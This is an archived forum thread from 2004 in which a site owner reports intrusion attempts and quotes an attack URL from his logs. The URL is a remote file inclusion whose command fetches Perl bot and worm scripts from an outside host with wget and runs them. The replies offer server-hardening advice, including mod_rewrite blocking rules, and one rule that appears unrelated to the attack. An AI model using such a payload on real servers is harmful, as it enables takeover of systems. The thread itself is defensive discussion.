assembler Posted December 27, 2004 Posted December 27, 2004 I have been having some hacking attempts on my site. The script basically crawls my sight and attempts to cause problems by running commands in the URL. The URL used looks like (I separated onto multiple lines): ?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp; wget%20www.visualcoders.net/spybot.txt; wget%20wwwwww.visualcoders.net/worm1.txt; wget%20www.visualcoders.net/php.txt; wget%20www.visualcoders.net/ownz.txt; wget%20www.visualcoders.net/zone.txt; perl%20spybot.txt; perl%20worm1.txt; perl%20ownz.txt; perl%20php.txt My Contributions
Guest Posted December 27, 2004 Posted December 27, 2004 you can try adding this to your .htaccess: RewriteCond %{QUERY_STRING} rush=([^&]+) [NC] RewriteRule ^.*$ emailsforyou.php [L]
♥Vger Posted December 27, 2004 Posted December 27, 2004 As long as your server version of PHP is secure (4.3.10 or 5+), and as long as you have no insecure old versions of various php scripts running you should be okay (e.g. phpBB, Invision Board, VBulletin, phpNuke, Post Nuke etc.) Vger
Guest Posted April 30, 2005 Posted April 30, 2005 I'm using this (found on this board some time ago): RewriteEngine On RewriteCond %{QUERY_STRING} :/ [NC] RewriteRule ^ - [F] If ":/" is found in the query string it returns an access forbidden error message. There might be situations where you need to have ":/" in a query string of course. (I needed it once to install a script). It really helped me out at the time, and I left in in place, just in case....
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.